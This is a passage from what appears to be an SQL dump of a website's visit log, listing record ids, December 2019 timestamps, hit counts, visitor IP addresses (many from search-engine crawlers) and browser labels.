,'8.29.198.26','other'),(466532,1575478999,2,2,0,0,'66.249.64.26','chrome'),(466533,1575479457,1,1,0,0,'66.249.70.62','chrome'),(466534,1575480099,2,2,0,0,'66.249.64.28','chrome'),(466535,1575480809,1,1,0,0,'8.29.198.27','other'),(466536,1575480829,1,1,0,0,'213.180.203.44','other'),(466537,1575482224,1,1,0,0,'66.249.64.26','chrome'),(466538,1575482512,1,1,0,0,'66.249.64.28','chrome'),(466539,1575482576,1,1,0,0,'8.209.79.9','chrome'),(466540,1575482982,2,2,0,0,'66.249.70.33','chrome'),(466541,1575483118,2,2,0,0,'207.46.13.119','other'),(466542,1575483132,1,1,0,0,'157.55.39.226','other'),(466543,1575483220,1,1,0,0,'66.249.64.27','chrome'),(466544,1575484385,1,1,0,0,'66.249.64.28','chrome'),(466545,1575485655,1,1,0,0,'66.249.64.28','chrome'),(466546,1575486112,1,1,0,0,'213.180.203.44','other'),(466547,1575486917,1,1,0,0,'66.249.64.28','chrome'),(466548,1575488120,1,1,0,0,'66.249.64.27','chrome'),(466549,1575488144,2,2,0,0,'207.46.13.113','other'),(466550,1575488414,1,1,0,0,'213.180.203.44','other'),(466551,1575488431,1,1,0,0,'66.249.64.28','chrome'),(466552,1575489443,1,1,0,0,'66.249.64.27','chrome'),(466553,1575489817,1,1,0,0,'8.29.198.26','other'),(466554,1575490623,2,2,0,0,'66.249.64.27','chrome'),(466555,1575490949,1,1,0,0,'213.180.203.44','other'),(466556,1575491216,1,1,0,0,'66.249.64.26','chrome'),(466557,1575491702,1,1,0,0,'8.29.198.27','other'),(466558,1575491884,1,1,0,0,'207.46.13.119','other'),(466559,1575492495,1,1,0,0,'66.249.64.27','chrome'),(466560,1575492528,1,1,0,0,'66.102.9.164','chrome'),(466561,1575492619,1,0,1,0,'157.55.39.76',''),(466562,1575492682,1,1,0,0,'66.249.70.62','chrome'),(466563,1575492998,2,2,0,0,'66.249.64.26','chrome'),(466564,1575493735,1,1,0,0,'213.180.203.44','other'),(466565,1575493852,1,1,0,0,'66.249.70.62','chrome'),(466566,1575494299,1,1,0,0,'207.46.13.113','other'),(466567,1575494935,1,1,0,0,'213.180.203.44','other'),(466568,1575495379,1,1,0,0,'66.249.70.36','chrome'),(466569,1575495864,1,1,0,0,'66.249.64.28','chrome'),(466570,1575496252,3,2,1,0,'66.249.64.27',''),(466571,1575496376,1,0,1,0,'207.46.13.113',''),(466572,1575496465,1,1,0,0,'213.180.203.44','other'),(466573,1575496469,1,1,0,0,'213.180.203.37','other'),(466574,1575496683,1,0,1,0,'66.249.64.26',''),(466575,1575497009,3,3,0,0,'66.249.64.28','chrome'),(466576,1575497017,2,2,0,0,'66.249.64.27','chrome'),(466577,1575497043,2,2,0,0,'66.249.64.26','chrome'),(466578,1575497171,1,1,0,0,'66.249.70.62','chrome'),(466579,1575497945,1,1,0,0,'213.180.203.44','other'),(466580,1575498135,2,2,0,0,'66.249.64.26','chrome'),(466581,1575498644,1,1,0,0,'5.58.90.227','firefox'),(466582,1575500449,1,1,0,0,'213.180.203.44','other'),(466583,1575500698,1,1,0,0,'207.46.13.119','other'),(466584,1575500703,1,1,0,0,'8.29.198.25','other'),(466585,1575501240,2,2,0,0,'66.249.70.36','chrome'),(466586,1575501462,1,1,0,0,'66.249.64.27','chrome'),(466587,1575501532,1,1,0,0,'213.180.203.37','other'),(466588,1575502007,2,2,0,0,'66.249.64.28','chrome'),(466589,1575502633,1,1,0,0,'8.29.198.26','other'),(466590,1575503591,1,1,0,0,'207.46.13.113','other'),(466591,1575503998,1,1,0,0,'66.249.64.26','chrome'),(466592,1575504159,1,1,0,0,'157.55.39.38','other'),(466593,1575504567,1,1,0,0,'66.249.70.36','chrome'),(466594,1575504655,57,57,0,0,'144.76.72.24','other'),(466595,1575505067,3,3,0,0,'66.249.64.27','chrome'),(466596,1575505531,2,2,0,0,'213.180.203.44','other'),(466597,1575505582,60,60,0,0,'144.76.72.24','other'),(466598,1575506494,62,62,0,0,'144.76.72.24','other'),(466599,1575506833,1,1,0,0,'66.249.70.62','chrome'),(466600,1575507110,1,1,0,0,'66.249.64.26','chrome'),(466601,1575507404,61,61,0,0,'144.76.72.24','other'),(466602,1575508305,66,66,0,0,'144.76.72.24','other'),(466603,1575509044,1,1,0,0,'66.249.64.28','chrome'),(466604,1575509216,69,69,0,0,'144.76.72.24','other'),(466605,1575509221,1,1,0,0,'66.249.70.33','chrome'),(466606,1575509633,1,1,0,0,'66.249.70.62','chrome'),(466607,1575510035,1,1,0,0,'66.249.64.28','chrome'),(466608,1575510128,66,66,0,0,'144.76.72.24','other'),(466609,1575510247,1,1,0,0,'213.180.203.44','other'),(466610,1575510383,1,1,0,0,'66.249.70.33','chrome'),(466611,1575510534,1,1,0,0,'66.249.64.26','chrome'),(466612,1575510786,2,2,0,0,'66.249.64.27','chrome'),(466613,1575511033,72,72,0,0,'144.76.72.24','other'),(466614,1575511608,1,1,0,0,'8.29.198.25','other'),(466615,1575511792,1,1,0,0,'213.180.203.44','other'),(466616,1575511944,77,77,0,0,'144.76.72.24','other'),(466617,1575512084,1,1,0,0,'66.249.70.36','chrome'),(466618,1575512854,63,63,0,0,'144.76.72.24','other'),(466619,1575513055,2,2,0,0,'213.180.203.44','other'),(466620,1575513058,1,1,0,0,'213.180.203.37','other'),(466621,1575513359,2,2,0,0,'66.249.64.27','chrome'),(466622,1575513513,1,1,0,0,'8.29.198.26','other'),(466623,1575513755,65,65,0,0,'144.76.72.24','other'),(466624,1575513880,1,1,0,0,'66.249.64.28','chrome'),(466625,1575514028,1,1,0,0,'66.249.64.26','chrome'),(466626,1575514250,1,1,0,0,'213.180.203.44','other'),(466627,1575514657,39,39,0,0,'144.76.72.24','other'),(466628,1575515012,2,2,0,0,'66.249.64.26','chrome'),(466629,1575515235,3,3,0,0,'66.249.64.27','chrome'),(466630,1575515399,2,2,0,0,'207.46.13.119','other'),(466631,1575515454,1,1,0,0,'213.180.203.44','other'),(466632,1575516210,3,3,0,0,'66.249.64.27','chrome'),(466633,1575516216,2,2,0,0,'66.249.64.26','chrome'),(466634,1575516384,1,1,0,0,'66.249.70.62','chrome'),(466635,1575516627,1,1,0,0,'144.76.72.24','other'),(466636,1575516661,1,1,0,0,'66.249.64.28','chrome'),(466637,1575517202,1,1,0,0,'207.46.13.154','other'),(466638,1575517221,1,1,0,0,'207.46.13.135','other'),(466639,1575518065,1,1,0,0,'157.55.39.38','other'),(466640,1575518118,1,1,0,0,'66.249.64.26','chrome'),(466641,1575518190,1,1,0,0,'213.180.203.44','other'),(466642,1575518364,4,4,0,0,'60.191.38.77','firefox'),(466643,1575518365,1,1,0,0,'64.246.161.42','firefox'),(466644,1575519686,1,1,0,0,'46.211.129.144','chrome'),(466645,1575519967,1,1,0,0,'207.46.13.154','other'),(466646,1575520681,1,1,0,0,'46.211.213.29','chrome'),(466647,1575521193,1,1,0,0,'66.249.64.26','chrome'),(466648,1575522174,1,1,0,0,'79.110.25.244','chrome'),(466649,1575522490,1,1,0,0,'8.29.198.26','other'),(466650,1575523062,1,1,0,0,'213.180.203.44','other'),(466651,1575524382,1,1,0,0,'8.29.198.26','other'),(466652,1575524725,1,1,0,0,'66.249.70.36','chrome'),(466653,1575525159,1,1,0,0,'138.246.253.5','chrome'),(466654,1575525260,1,1,0,0,'157.55.39.9','other'),(466655,1575525617,2,2,0,0,'157.55.39.210','other'),(466656,1575525756,2,2,0,0,'213.180.203.44','other'),(466657,1575527169,1,1,0,0,'92.112.125.77','chrome'),(466658,1575527258,2,2,0,0,'157.55.39.38','other'),(466659,1575527465,2,2,0,0,'213.180.203.44','other'),(466660,1575527745,1,1,0,0,'207.46.13.190','other'),(466661,1575528415,3,3,0,0,'213.180.203.44','other'),(466662,1575529784,1,1,0,0,'213.180.203.37','other'),(466663,1575529841,1,1,0,0,'213.180.203.44','other'),(466664,1575529861,1,1,0,0,'66.249.64.28','chrome'),(466665,1575529994,1,1,0,0,'66.249.64.26','chrome'),(466666,1575530292,1,1,0,0,'80.249.144.78','other'),(466667,1575530488,1,1,0,0,'207.46.13.190','other'),(466668,1575530710,1,1,0,0,'66.249.70.33','chrome'),(466669,1575531036,1,1,0,0,'213.180.203.44','other'),(466670,1575531358,1,1,0,0,'91.196.178.180','chrome'),(466671,1575532250,1,1,0,0,'66.249.70.62','chrome'),(466672,1575532316,1,1,0,0,'157.55.39.210','other'),(466673,1575532689,1,1,0,0,'91.196.178.87','chrome'),(466674,1575532720,1,1,0,0,'95.108.181.104','other'),(466675,1575533404,1,1,0,0,'8.29.198.26','other'),(466676,1575533976,1,1,0,0,'213.180.203.44','other'),(466677,1575534227,1,1,0,0,'207.46.13.190','other'),(466678,1575535253,1,1,0,0,'8.29.198.25','other'),(466679,1575535448,1,1,0,0,'213.180.203.37','other'),(466680,1575535512,1,1,0,0,'213.180.203.44','other'),(466681,1575536214,1,1,0,0,'128.74.204.13','other'),(466682,1575536301,1,1,0,0,'91.196.178.173','chrome'),(466683,1575536453,1,1,0,0,'157.55.39.210','other'),(466684,1575536506,1,1,0,0,'213.180.203.37','chrome'),(466685,1575536597,2,2,0,0,'91.196.178.180','chrome'),(466686,1575536685,1,1,0,0,'213.180.203.44','other'),(466687,1575537175,1,1,0,0,'207.46.13.109','other'),(466688,1575537271,1,1,0,0,'91.196.178.173','chrome'),(466689,1575537636,134,134,0,0,'95.216.20.54','other'),(466690,1575537829,1,1,0,0,'91.196.178.175','chrome'),(466691,1575537851,1,1,0,0,'213.180.203.37','other'),(466692,1575537961,1,1,0,0,'213.180.203.44','other'),(466693,1575538356,1,1,0,0,'77.111.247.51','chrome'),(466694,1575538837,1,0,1,0,'157.55.39.210',''),(466695,1575539009,1,1,0,0,'66.249.64.28','chrome'),(466696,1575539151,1,1,0,0,'46.219.3.13','chrome'),(466697,1575539275,1,1,0,0,'66.249.64.27','chrome'),(466698,1575539487,1,1,0,0,'91.196.179.33','chrome'),(466699,1575539970,1,1,0,0,'91.196.178.67','chrome'),(466700,1575540318,1,1,0,0,'165.22.39.17','other'),(466701,1575540477,2,2,0,0,'91.196.178.73','firefox'),(466702,1575540872,1,1,0,0,'91.196.178.173','chrome'),(466703,1575540922,1,1,0,0,'3.229.138.239','chrome'),(466704,1575540940,1,1,0,0,'213.180.203.37','other'),(466705,1575540977,1,1,0,0,'91.196.178.98','chrome'),(466706,1575541189,1,0,1,0,'157.55.39.235',''),(466707,1575541212,1,0,1,0,'207.46.13.109',''),(466708,1575541244,1,1,0,0,'167.172.28.214','other'),(466709,1575541312,2,2,0,0,'66.249.64.28','chrome'),(466710,1575541465,1,1,0,0,'207.46.13.109','other'),(466711,1575542032,1,1,0,0,'66.249.70.36','chrome'),(466712,1575542178,1,1,0,0,'66.249.64.26','chrome'),(466713,1575542411,1,1,0,0,'66.249.64.27','chrome'),(466714,1575542616,1,1,0,0,'157.55.39.202','other'),(466715,1575543073,1,1,0,0,'157.55.39.235','other'),(466716,1575543593,2,2,0,0,'213.180.203.44','other'),(466717,1575543845,2,2,0,0,'66.249.64.28','chrome'),(466718,1575544102,1,1,0,0,'66.249.64.27','chrome'),(466719,1575544121,1,1,0,0,'66.249.70.33','chrome'),(466720,1575544286,1,1,0,0,'8.29.198.27','other'),(466721,1575544754,1,1,0,0,'213.180.203.44','other'),(466722,1575545313,1,1,0,0,'109.74.154.72','chrome'),(466723,1575545926,1,0,1,0,'157.55.39.235',''),(466724,1575546118,1,1,0,0,'213.180.203.44','other'),(466725,1575546121,1,1,0,0,'8.29.198.27','other'),(466726,1575546542,1,1,0,0,'66.249.64.28','chrome'),(466727,1575547010,1,1,0,0,'66.249.70.46','chrome'),(466728,1575547128,1,1,0,0,'91.196.178.162','chrome'),(466729,1575548093,1,1,0,0,'91.196.179.33','chrome'),(466730,1575548482,1,1,0,0,'207.46.13.109','other'),(466731,1575548609,1,1,0,0,'31.13.127.9','other'),(466732,1575548610,1,1,0,0,'31.13.127.1','other'),(466733,1575548768,1,1,0,0,'157.55.39.87','other'),(466734,1575548783,1,1,0,0,'66.249.64.27','chrome'),(466735,1575549453,1,1,0,0,'91.196.178.173','chrome'),(466736,1575549544,1,1,0,0,'91.196.178.79','firefox'),(466737,1575549727,1,1,0,0,'91.196.178.67','chrome'),(466738,1575549949,1,1,0,0,'157.55.39.202','other'),(466739,1575550186,1,1,0,0,'66.249.64.28','chrome'),(466740,1575550191,1,1,0,0,'213.180.203.44','other'),(466741,1575550289,2,2,0,0,'66.249.64.27','chrome'),(466742,1575550720,1,1,0,0,'91.196.178.67','chrome'),(466743,1575550732,1,1,0,0,'31.13.127.22','other'),(466744,1575550733,1,1,0,0,'31.13.127.12','other'),(466745,1575550741,1,1,0,0,'31.13.115.2','other'),(466746,1575550742,1,1,0,0,'31.13.115.13','other'),(466747,1575550783,1,1,0,0,'66.249.70.33','chrome'),(466748,1575550890,1,0,1,0,'207.46.13.170',''),(466749,1575550897,1,1,0,0,'91.196.178.79','firefox'),(466750,1575550913,1,1,0,0,'128.124.235.161','chrome'),(466751,1575550984,2,2,0,0,'66.249.64.26','chrome'),(466752,1575551132,1,1,0,0,'157.55.39.87','other'),(466753,1575551276,1,1,0,0,'213.180.203.44','other'),(466754,1575551474,1,1,0,0,'88.154.17.132','chrome'),(466755,1575551510,2,2,0,0,'46.211.134.223','other'),(466756,1575551545,1,1,0,0,'66.249.64.28','chrome'),(466757,1575551561,2,2,0,0,'91.196.178.173','chrome'),(466758,1575551617,1,0,1,0,'157.55.39.235',''),(466759,1575551622,1,1,0,0,'66.249.64.27','chrome'),(466760,1575551818,1,1,0,0,'91.196.178.67','chrome'),(466761,1575552320,1,1,0,0,'91.196.178.79','firefox'),(466762,1575552530,1,1,0,0,'213.180.203.44','other'),(466763,1575553013,4,3,1,0,'207.46.13.170',''),(466764,1575553025,1,1,0,0,'157.55.39.235','other'),(466765,1575553406,1,1,0,0,'141.8.142.2','other'),(466766,1575553520,4,4,0,0,'66.249.64.26','chrome'),(466767,1575553529,1,1,0,0,'66.249.70.36','chrome'),(466768,1575553575,1,1,0,0,'46.211.135.161','chrome'),(466769,1575553758,1,1,0,0,'66.249.64.27','chrome'),(466770,1575554026,1,1,0,0,'213.180.203.44','other'),(466771,1575554432,1,1,0,0,'91.196.178.67','chrome'),(466772,1575554597,1,1,0,0,'213.180.203.37','other'),(466773,1575554777,1,1,0,0,'188.163.102.44','chrome'),(466774,1575554947,2,2,0,0,'157.55.39.235','other'),(466775,1575555181,1,1,0,0,'8.29.198.27','other'),(466776,1575556465,1,1,0,0,'91.196.178.79','firefox'),(466777,1575556788,5,5,0,0,'66.249.64.27','chrome'),(466778,1575556875,1,1,0,0,'213.180.203.44','other'),(466779,1575556989,3,3,0,0,'66.249.64.28','chrome'),(466780,1575557008,1,1,0,0,'82.207.116.16','other'),(466781,1575557028,1,1,0,0,'8.29.198.26','other'),(466782,1575557173,1,1,0,0,'91.196.178.67','chrome'),(466783,1575557187,1,1,0,0,'66.249.70.62','chrome'),(466784,1575557520,9,9,0,0,'66.249.64.26','chrome'),(466785,1575557585,2,2,0,0,'157.55.39.235','other'),(466786,1575557658,1,1,0,0,'66.249.70.36','chrome'),(466787,1575557804,1,1,0,0,'91.196.178.189','chrome'),(466788,1575558013,2,2,0,0,'66.249.70.33','chrome'),(466789,1575558165,2,2,0,0,'66.249.64.28','chrome'),(466790,1575558176,7,7,0,0,'66.249.64.27','chrome'),(466791,1575558296,1,1,0,0,'213.180.203.44','other'),(466792,1575558649,1,1,0,0,'31.13.127.6','other'),(466793,1575558650,1,1,0,0,'31.13.127.17','other'),(466794,1575558716,6,6,0,0,'66.249.64.26','chrome'),(466795,1575559108,2,2,0,0,'66.249.64.27','chrome'),(466796,1575559358,1,1,0,0,'213.180.203.44','other'),(466797,1575559471,1,1,0,0,'66.249.64.28','chrome'),(466798,1575559503,1,1,0,0,'66.249.70.62','chrome'),(466799,1575559650,2,2,0,0,'66.249.64.26','chrome'),(466800,1575560132,3,3,0,0,'66.249.64.27','chrome'),(466801,1575560354,1,1,0,0,'91.196.178.30','chrome'),(466802,1575560465,2,2,0,0,'66.249.64.28','chrome'),(466803,1575560575,2,2,0,0,'66.249.64.26','chrome'),(466804,1575561022,1,1,0,0,'91.196.178.75','firefox'),(466805,1575561057,1,1,0,0,'207.46.13.121','other'),(466806,1575561224,2,2,0,0,'66.249.64.27','chrome'),(466807,1575561269,1,1,0,0,'66.249.70.36','chrome'),(466808,1575561669,2,2,0,0,'66.249.64.28','chrome'),(466809,1575562592,1,1,0,0,'66.249.64.26','chrome'),(466810,1575563242,1,1,0,0,'213.180.203.44','other'),(466811,1575563494,1,1,0,0,'66.249.64.28','chrome'),(466812,1575564040,1,1,0,0,'157.55.39.249','other'),(466813,1575564069,1,1,0,0,'91.196.177.231','chrome'),(466814,1575564084,1,1,0,0,'213.174.0.4','chrome'),(466815,1575565074,1,1,0,0,'213.174.0.4','chrome'),(466816,1575565999,1,1,0,0,'66.249.64.27','chrome'),(466817,1575566105,1,1,0,0,'8.29.198.26','other'),(466818,1575566483,1,1,0,0,'207.46.13.121','other'),(466819,1575566501,2,0,2,0,'157.55.39.249',''),(466820,1575566507,1,1,0,0,'46.133.8.131','chrome'),(466821,1575566708,1,1,0,0,'92.113.168.63','firefox'),(466822,1575567110,2,0,2,0,'157.55.39.87',''),(466823,1575567143,1,1,0,0,'91.209.11.236','other'),(466824,1575567777,1,1,0,0,'213.180.203.37','other'),(466825,1575567927,1,1,0,0,'8.29.198.25','other'),(466826,1575568358,1,1,0,0,'91.196.178.3','chrome'),(466827,1575569102,1,1,0,0,'188.163.98.207','chrome'),(466828,1575569538,1,1,0,0,'128.124.250.15','chrome'),(466829,1575569573,1,1,0,0,'213.180.203.37','other'),(466830,1575569832,2,2,0,0,'46.133.8.131','chrome'),(466831,1575569899,2,2,0,0,'91.196.178.3','chrome'),(466832,1575569922,2,2,0,0,'31.13.127.20','other'),(466833,1575569923,1,1,0,0,'31.13.127.24','other'),(466834,1575570046,1,1,0,0,'91.196.178.135','chrome'),(466835,1575570058,1,1,0,0,'31.13.115.11','other'),(466836,1575570060,1,1,0,0,'31.13.115.6','other'),(466837,1575570062,1,1,0,0,'66.220.149.56','other'),(466838,1575570670,1,1,0,0,'207.46.13.170','other'),(466839,1575571441,1,1,0,0,'128.124.250.15','chrome'),(466840,1575571559,2,2,0,0,'213.231.11.88','firefox'),(466841,1575571768,1,0,1,0,'157.55.39.249',''),(466842,1575572465,1,1,0,0,'13.66.139.0','other'),(466843,1575572897,1,1,0,0,'72.137.84.71','chrome'),(466844,1575572998,1,0,1,0,'157.55.39.249',''),(466845,1575573089,1,1,0,0,'66.249.64.27','chrome'),(466846,1575574360,1,1,0,0,'213.180.203.44','other'),(466847,1575574779,1,1,0,0,'24.133.252.87','chrome'),(466848,1575574963,1,1,0,0,'130.180.212.60','other'),(466849,1575575753,1,1,0,0,'91.196.178.100','chrome'),(466850,1575575759,1,1,0,0,'157.55.39.87','other'),(466851,1575575810,1,1,0,0,'207.46.13.170','other'),(466852,1575575928,1,1,0,0,'130.180.212.60','other'),(466853,1575577012,1,1,0,0,'8.29.198.26','other'),(466854,1575577079,1,1,0,0,'130.180.212.60','other'),(466855,1575577604,2,2,0,0,'66.249.64.26','chrome'),(466856,1575577992,1,1,0,0,'213.180.203.44','other'),(466857,1575578089,3,3,0,0,'157.55.39.87','other'),(466858,1575578352,1,1,0,0,'138.246.253.5','chrome'),(466859,1575578814,1,1,0,0,'8.29.198.25','other'),(466860,1575579060,1,0,1,0,'157.55.39.80',''),(466861,1575580319,1,0,1,0,'157.55.39.80',''),(466862,1575580412,1,1,0,0,'31.13.127.23','other'),(466863,1575580413,1,1,0,0,'31.13.127.1','other'),(466864,1575580458,1,1,0,0,'209.17.96.146','other'),(466865,1575580552,1,1,0,0,'198.199.123.206','firefox'),(466866,1575580622,1,1,0,0,'66.249.64.28','chrome'),(466867,1575581077,1,1,0,0,'95.132.58.84','chrome'),(466868,1575581185,1,1,0,0,'31.13.115.23','other'),(466869,1575583137,1,0,1,0,'157.55.39.70',''),(466870,1575583290,1,1,0,0,'66.249.64.27','chrome'),(466871,1575583876,1,1,0,0,'52.162.161.148','other'),(466872,1575584180,1,1,0,0,'157.55.39.80','other'),(466873,1575584430,1,0,1,0,'157.55.39.70',''),(466874,1575584935,1,1,0,0,'66.249.64.26','chrome'),(466875,1575585992,1,1,0,0,'213.180.203.44','other'),(466876,1575586597,1,0,1,0,'157.55.39.70',''),(466877,1575586822,1,0,1,0,'207.46.13.29',''),(466878,1575587362,1,1,0,0,'209.17.96.98','other'),(466879,1575587705,1,1,0,0,'66.249.64.27','chrome'),(466880,1575587909,1,1,0,0,'8.29.198.27','other'),(466881,1575587923,1,0,1,0,'157.55.39.70',''),(466882,1575588114,1,0,1,0,'207.46.13.29',''),(466883,1575588352,1,1,0,0,'207.46.13.29','other'),(466884,1575588471,1,1,0,0,'88.99.2.203','other'),(466885,1575588538,7,7,0,0,'136.243.70.68','other'),(466886,1575589687,1,1,0,0,'8.29.198.26','other'),(466887,1575590220,1,1,0,0,'157.55.39.70','other'),(466888,1575592379,2,2,0,0,'157.55.39.80','other'),(466889,1575592518,1,1,0,0,'157.55.39.87','other'),(466890,1575592603,1,1,0,0,'66.249.70.36','chrome'),(466891,1575594753,1,1,0,0,'66.249.64.27','chrome'),(466892,1575595767,2,2,0,0,'213.180.203.44','other'),(466893,1575596402,1,1,0,0,'175.100.60.220','chrome'),(466894,1575597095,1,1,0,0,'66.249.64.27','chrome'),(466895,1575598489,1,1,0,0,'207.46.13.58','other'),(466896,1575598786,1,1,0,0,'8.29.198.25','other'),(466897,1575599000,1,1,0,0,'66.249.64.27','chrome'),(466898,1575599094,1,1,0,0,'66.249.64.26','chrome'),(466899,1575600161,1,1,0,0,'52.162.161.148','other'),(466900,1575600550,1,1,0,0,'8.29.198.26','other'),(466901,1575600607,1,1,0,0,'66.249.70.36','chrome'),(466902,1575600646,1,1,0,0,'66.249.70.33','chrome'),(466903,1575601277,1,1,0,0,'52.162.161.148','other'),(466904,1575601765,1,1,0,0,'213.180.203.44','other'),(466905,1575601923,2,2,0,0,'207.46.13.58','other'),(466906,1575602676,1,1,0,0,'66.249.70.62','chrome'),(466907,1575604512,1,1,0,0,'46.211.154.179','chrome'),(466908,1575604891,1,1,0,0,'31.13.115.2','other'),(466909,1575605073,1,1,0,0,'66.249.64.28','chrome'),(466910,1575605556,1,1,0,0,'213.180.203.44','other'),(466911,1575606743,1,1,0,0,'141.8.142.115','other'),(466912,1575607973,1,1,0,0,'91.196.178.73','chrome'),(466913,1575609649,1,1,0,0,'8.29.198.25','other'),(466914,1575609684,1,1,0,0,'66.249.70.62','chrome'),(466915,1575609889,1,1,0,0,'95.132.58.84','chrome'),(466916,1575610262,1,1,0,0,'213.180.203.44','other'),(466917,1575610982,1,1,0,0,'5.58.25.175','chrome'),(466918,1575611409,1,1,0,0,'8.29.198.26','other'),(466919,1575612194,1,1,0,0,'66.249.64.28','chrome'),(466920,1575613188,1,1,0,0,'46.133.8.131','chrome'),(466921,1575613648,2,2,0,0,'91.196.178.67','chrome'),(466922,1575613695,1,1,0,0,'46.211.140.151','chrome'),(466923,1575613906,1,1,0,0,'207.46.13.58','other'),(466924,1575613929,1,1,0,0,'51.38.63.63','firefox'),(466925,1575614053,1,1,0,0,'77.111.247.65','chrome'),(466926,1575615321,1,1,0,0,'213.180.203.44','other'),(466927,1575616330,1,1,0,0,'66.249.64.28','chrome'),(466928,1575617566,1,1,0,0,'66.249.64.26','chrome'),(466929,1575617733,1,1,0,0,'91.196.178.67','chrome'),(466930,1575617757,1,1,0,0,'91.196.178.173','chrome'),(466931,1575618255,1,1,0,0,'91.225.142.211','chrome'),(466932,1575618614,1,1,0,0,'91.196.178.183','chrome'),(466933,1575619477,1,1,0,0,'66.249.64.28','chrome'),(466934,1575619479,2,2,0,0,'66.249.64.26','chrome'),(466935,1575619508,1,1,0,0,'77.222.134.102','chrome'),(466936,1575619636,1,1,0,0,'91.196.178.67','chrome'),(466937,1575620005,1,1,0,0,'37.55.226.163','firefox'),(466938,1575620142,1,1,0,0,'66.249.64.27','chrome'),(466939,1575620404,1,1,0,0,'213.180.203.44','other'),(466940,1575620535,1,1,0,0,'8.29.198.25','other'),(466941,1575621611,1,1,0,0,'107.178.194.172','chrome'),(466942,1575622300,1,1,0,0,'8.29.198.27','other'),(466943,1575622324,2,2,0,0,'207.46.13.58','other'),(466944,1575623262,1,1,0,0,'91.196.177.193','chrome'),(466945,1575624152,1,1,0,0,'91.196.178.67','chrome'),(466946,1575624177,1,1,0,0,'178.154.200.33','other'),(466947,1575624263,1,1,0,0,'13.59.19.42','chrome'),(466948,1575624730,1,1,0,0,'91.196.178.102','chrome'),(466949,1575625881,2,2,0,0,'91.196.177.46','chrome'),(466950,1575626450,3,3,0,0,'157.55.39.140','other'),(466951,1575626892,1,1,0,0,'66.249.70.36','chrome'),(466952,1575627034,1,1,0,0,'91.196.178.173','chrome'),(466953,1575627063,1,1,0,0,'176.98.69.152','firefox'),(466954,1575627721,1,1,0,0,'66.249.64.27','chrome'),(466955,1575628201,1,1,0,0,'66.249.64.26','chrome'),(466956,1575628257,1,1,0,0,'207.46.13.58','other'),(466957,1575628443,1,1,0,0,'213.180.203.44','other'),(466958,1575629718,1,1,0,0,'45.66.35.35','firefox'),(466959,1575629887,1,1,0,0,'27.254.63.114','firefox'),(466960,1575630006,1,1,0,0,'213.180.203.44','other'),(466961,1575630176,1,1,0,0,'66.249.64.26','chrome'),(466962,1575630427,1,1,0,0,'157.55.39.140','other'),(466963,1575630764,1,1,0,0,'207.46.13.89','other'),(466964,1575631412,1,1,0,0,'8.29.198.26','other'),(466965,1575632006,1,1,0,0,'109.74.154.72','chrome'),(466966,1575632065,1,1,0,0,'66.249.64.26','chrome'),(466967,1575632541,1,1,0,0,'46.211.238.89','chrome'),(466968,1575632617,1,1,0,0,'157.55.39.140','other'),(466969,1575632620,1,1,0,0,'37.53.110.17','firefox'),(466970,1575633174,1,1,0,0,'8.29.198.27','other'),(466971,1575633217,1,1,0,0,'185.30.202.228','chrome'),(466972,1575633523,1,1,0,0,'66.249.93.218','chrome'),(466973,1575633564,1,1,0,0,'91.196.177.20','chrome'),(466974,1575634349,1,1,0,0,'91.196.178.173','chrome'),(466975,1575634750,2,0,2,0,'157.55.39.140',''),(466976,1575635407,1,1,0,0,'37.73.221.233','chrome'),(466977,1575635590,1,1,0,0,'91.196.178.180','chrome'),(466978,1575635737,1,1,0,0,'213.180.203.44','other'),(466979,1575636044,1,1,0,0,'66.249.64.26','chrome'),(466980,1575636927,1,1,0,0,'213.180.203.44','other'),(466981,1575637184,1,1,0,0,'91.196.177.46','chrome'),(466982,1575637613,1,1,0,0,'91.196.178.73','chrome'),(466983,1575638479,1,1,0,0,'91.196.178.69','firefox'),(466984,1575639146,1,1,0,0,'93.78.184.242','firefox'),(466985,1575639188,1,1,0,0,'207.46.13.58','other'),(466986,1575639369,1,1,0,0,'66.249.64.28','chrome'),(466987,1575639514,1,1,0,0,'91.196.178.97','chrome'),(466988,1575639852,1,1,0,0,'91.196.177.46','firefox'),(466989,1575640732,1,1,0,0,'213.180.203.44','other'),(466990,1575641136,1,1,0,0,'188.163.44.148','msie'),(466991,1575641296,1,1,0,0,'13.66.139.0','other'),(466992,1575642310,1,1,0,0,'8.29.198.26','other'),(466993,1575642641,1,1,0,0,'91.209.11.236','other'),(466994,1575642778,1,1,0,0,'66.249.64.27','chrome'),(466995,1575643187,2,2,0,0,'213.180.203.44','other'),(466996,1575644068,1,1,0,0,'8.29.198.26','other'),(466997,1575644764,1,1,0,0,'91.196.178.174','chrome'),(466998,1575645758,1,1,0,0,'91.196.178.174','chrome'),(466999,1575646754,1,1,0,0,'91.196.178.169','chrome'),(467000,1575647661,1,1,0,0,'91.196.179.33','chrome'),(467001,1575647797,2,2,0,0,'213.180.203.44','other'),(467002,1575648101,1,1,0,0,'91.196.178.66','firefox'),(467003,1575648559,1,1,0,0,'66.249.64.28','chrome'),(467004,1575649108,1,1,0,0,'91.196.178.169','chrome'),(467005,1575649157,2,2,0,0,'69.171.251.13','other'),(467006,1575649177,1,1,0,0,'66.249.64.26','chrome'),(467007,1575649404,1,1,0,0,'130.180.210.249','chrome'),(467008,1575649420,1,1,0,0,'213.180.203.37','other'),(467009,1575649583,2,2,0,0,'213.180.203.44','other'),(467010,1575650611,2,2,0,0,'66.249.64.26','chrome'),(467011,1575651520,1,1,0,0,'213.180.203.44','other'),(467012,1575652129,1,1,0,0,'128.124.96.162','chrome'),(467013,1575652154,1,1,0,0,'207.46.13.243','other'),(467014,1575652308,1,1,0,0,'173.252.95.59','other'),(467015,1575652674,1,1,0,0,'141.8.142.2','other'),(467016,1575653178,1,1,0,0,'8.29.198.26','other'),(467017,1575653223,1,1,0,0,'46.211.243.125','chrome'),(467018,1575653734,2,2,0,0,'66.249.64.28','chrome'),(467019,1575654883,1,1,0,0,'46.211.244.234','chrome'),(467020,1575654942,1,1,0,0,'8.29.198.27','other'),(467021,1575654944,1,1,0,0,'31.13.127.5','other'),(467022,1575654950,1,1,0,0,'31.13.115.22','other'),(467023,1575654969,1,1,0,0,'31.13.127.24','other'),(467024,1575654971,1,1,0,0,'31.13.127.19','other'),(467027,1575654980,1,1,0,0,'173.252.127.18','other'),(467028,1575654996,1,1,0,0,'91.196.178.14','chrome'),(467029,1575655287,2,2,0,0,'91.218.15.61','chrome'),(467030,1575655677,1,1,0,0,'46.211.134.179','chrome'),(467031,1575655716,1,1,0,0,'66.249.70.33','chrome'),(467032,1575656002,1,1,0,0,'37.54.23.188','chrome'),(467033,1575656019,1,1,0,0,'46.211.244.2